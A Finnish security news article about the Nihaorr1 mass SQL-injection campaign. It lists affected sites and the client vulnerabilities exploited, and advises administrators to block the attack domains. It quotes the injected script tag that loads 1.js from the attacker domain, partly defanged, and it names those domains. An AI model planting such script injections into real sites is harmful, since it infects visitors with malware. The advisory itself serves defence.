Suomalaissivustoillekin levitettyä saastutusepidemiaa voi rajoittaa estämällä pääsy hyökkäyssivustoille.
Websense Security Labsin löytämässä Nihaorr1-nimisessä hyökkäyksessä
verkkosivustoja saastutetaan laajamittaisesti lisäämällä niille
haittaohjelmasivustoille viittaavaa koodia.
Saastuneita sivustoja on verkossa jo yli puoli miljoonaa.
Saastutetuiksi ovat joutuneet mm. Yhdistyneiden Kansakuntien,
Unicefin, Pocket PC Magazinen ja SafeCanadan sivustot. Myös lentoyhtiö
Aeroflotin, urheilusivusto 24:n ja viiniketju Oddbinsin sivuille sekä
useille matkailusivuille suuntaavat ovat joutuneet epidemian kohteeksi.
Suomalaisista sivustoista ainakin DigiTV, Digita, Advantech,
Teräasekeskus ja Mytrims ovat eilisestä lukien joutuneet hyökkäyksen
kohteiksi. Sivustoja on sekä suomalaisten, alankomaalaisten että
norjalaisten operaattoreiden verkoissa ja niitä yhdistävä tekijä näyttää olevan Windows 2003 Server/IIS6.0-kokoonpano. Myös karkkilalaisen Helvarin
.fi-päätteisillä sivuilla koodia löytyi useilta Viimeisimmät uutiset
-sivuilta.
Ylläpitäjät voivat estää epidemian leviämistä estämällä
verkkoliikenteen palvelimille, joista haittaohjelmakoodia organisaation
verkkosivuille haetaan. Näiden sivustojen osoitteet ovat nihaorr1 . com,
nmidahena . com ja aspder . com. Saastutetun sivuston
otsikkokenttään on usein lisätty myös teksti <script src=http:/<script
src=http://www.nihaorr1 piste com /1.js>·</script>. Sama teksti löytyy myös lähdekoodista.
Eniten koodia oli eilen Digitan ja Helvarin asp-pohjaisilla sivuilla ja
Advantechin aspx-sivuilla. Mytrims ilmoitti tänä aamuna päivityskatkoksesta
eivätkä sivut olleet saavutettavissa. Kaikki suomalaissivustot
näyttävät nyt onneksi saadun puhdistetuiksi, mutta saastutettujen sivustojen
määrä kasvaa jatkuvasti.
Teknisesti sivustoille on saatu lisättyä vihamielisiä linkkejä, jolloin
pelkkä vierailu sivustoilla lataa esimerkiksi troijalaishaittaohjelmia
sivustolla kävijän tietokoneeseen. Verkkosivustojen saastutustapa on
niin sanottu sql-injektointi, SQL Injection. Se tarkoittaa syötteen tarkistuksessa
olevien puutteiden hyödyntämistä, jolloin sql-lauseisiin lisätyt
vihamieliset merkit pääsevät verkkosivut sisältävään tietokantaan asti
suoritettaviksi. Sivustoille ujutetut Iframe-kehykset lataavat
haittakoodia Pekingiin China Telecomin verkkoon rekisteröidystä
osoitteesta.
Epidemiassa käytetyistä työasemapään haavoittuvuuksista vakavin on
viime vuoden tammikuussa MS07-004-paikkauksen saanut
vektorigrafiikkahaavoittuvuus eli ns. VML-tapaus. Myös
RealPlayerin, Ajaxin sekä Yahoo ja QQ Instant Messengerin
haavoittuvuuksia selailuun käytettävässä työasemassa hyödynnetään.
YK:n sivuilla käytiin muuten myös viime elokuussa, jolloin kohteena olivat uutisosio ja pääsihteeri Ban Ki-Moonin puheet sisältävä osio. Nyt kohteena oli muun muassa Events-osio.
Kannattaa siis myös tutkia onko organisaatiosta ollut ulospäin liikennettä domaineihin nihaorr1. com,
nmidahena. com ja aspder. com [välilyönnit lisätty].